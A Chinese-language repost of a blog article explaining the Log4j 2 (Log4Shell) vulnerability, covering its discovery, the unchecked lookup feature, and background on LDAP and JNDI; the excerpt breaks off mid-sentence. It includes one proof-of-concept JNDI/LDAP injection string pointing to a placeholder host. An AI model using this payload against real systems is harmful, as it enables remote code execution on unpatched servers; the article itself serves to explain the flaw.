广告
返回顶部
首页 > 资讯 > 后端开发 > JAVA >log4j漏洞原理及攻击流程
  • 175
分享到

log4j漏洞原理及攻击流程

log4jjavaweb安全 2023-08-19 13:08:28 175人浏览 安东尼
摘要

log4j漏洞最早出现在2021年11月24日一位阿里安全团队的员工发现的,上报到Apache之后,12月10日凌晨才被公开。该漏洞威胁等级较高。基本比肩与阿里当年的fastJSON漏洞。 漏洞地址: 1.漏洞原理: Log4j是一种流行

log4j漏洞最早出现在2021年11月24日一位阿里安全团队的员工发现的,上报到Apache之后,12月10日凌晨才被公开。该漏洞威胁等级较高。基本比肩与阿里当年的fastJSON漏洞。
漏洞地址:
在这里插入图片描述

1.漏洞原理:

Log4j是一种流行的Java日志记录工具,其升级版本Log4j 2存在安全漏洞。这个漏洞是由Log4j 2的lookup功能引起的,该功能允许开发者使用某些协议读取环境配置。但是在实现这个功能时,未对输入进行严格检查,导致出现了安全漏洞。
poc:${jndi:ldap://192.168.1.x:5678/test}
以上就是一个简单的log4漏洞利用的poc,这里我们主要需要了解的就是这个poc中比较重要的jndi和ldap两个类名。通过对当前两个类名功能的了解我们也能对fastjson漏洞原理的理解做一个复习
ldap:
ldap大致意识就是一个轻量级的目录访问协议。其功能类似与早期中国黄页的出现,通过这个ldap能够迅速查早数据库中所需要的信息。其主要应用在gitla统一登录,sun基于文本数据库的储存功能等相类似的功能上使用。
jndi: java 命名和目录接口服务工具。由于直接使用jdbc直接连接数据库会引起参数无法直接修改、数据库产品更换驱动包修改麻烦、连接池参数修改麻烦等清理。所以这里使用jndi命名服务、通过连接,程序只需要知道名字,就能够直接去数据库匹配数据,并且其内部类也解决了jdbc的问题。

当然jndi的命名服务也正是产生漏洞的罪魁祸首。由于发布服务产生映射需要调用bind(),使用名字查找资源需要使用lookup(),导致攻击者利用lookup()远程请求攻击服务器并使其内置类执

来源地址:https://blog.csdn.net/weixin_54603520/article/details/130664112

--结束END--

本文标题: log4j漏洞原理及攻击流程

本文链接: https://www.lsjlt.com/news/375460.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
猜你喜欢
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作